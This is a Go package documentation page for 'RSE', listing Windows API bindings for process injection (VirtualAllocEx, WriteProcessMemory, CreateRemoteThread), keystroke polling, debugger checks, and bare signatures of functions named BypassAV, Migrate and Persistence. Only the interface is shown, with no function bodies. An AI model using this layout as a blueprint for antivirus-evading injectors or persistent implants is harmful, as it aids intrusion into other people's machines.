RSE

package
v0.0.0-...-1a6c432 Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Jan 26, 2017 License: MIT Imports: 2 Imported by: 0

Documentation

Index

Constants

View Source
const MEM_COMMIT = 0x1000
View Source
const MEM_RESERVE = 0x2000
View Source
const PAGE_EXECUTE_READWRITE = 0x40
View Source
const PROCESS_CREATE_THREAD = 0x0002
View Source
const PROCESS_QUERY_INFORMATION = 0x0400
View Source
const PROCESS_VM_OPERATION = 0x0008
View Source
const PROCESS_VM_READ = 0x0010
View Source
const PROCESS_VM_WRITE = 0x0020

Variables

View Source
var CreateRemoteThread = K32.MustFindProc("CreateRemoteThread")
View Source
var CreateThread = K32.MustFindProc("CreateThread")
View Source
var GetAsyncKeyState = USER32.MustFindProc("GetAsyncKeyState")
View Source
var IsDebuggerPresent = K32.MustFindProc("IsDebuggerPresent")
View Source
var K32 = syscall.MustLoadDLL("kernel32.dll") //kernel32.dll
View Source
var MagicNumber int64 = 0
View Source
var OpenProcess = K32.MustFindProc("OpenProcess")
View Source
var USER32 = syscall.MustLoadDLL("user32.dll") //user32.dll
View Source
var VirtualAlloc = K32.MustFindProc("VirtualAlloc")
View Source
var VirtualAllocEx = K32.MustFindProc("VirtualAllocEx")
View Source
var WriteProcessMemory = K32.MustFindProc("WriteProcessMemory")

Functions

func AllocateFakeMemory

func AllocateFakeMemory()

func BypassAV

func BypassAV(Rate int)

func CheckDebugger

func CheckDebugger()

func Jump

func Jump()

func Migrate

func Migrate(Addr uintptr, Size int)

func Persistence

func Persistence()

Types

This section is empty.

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL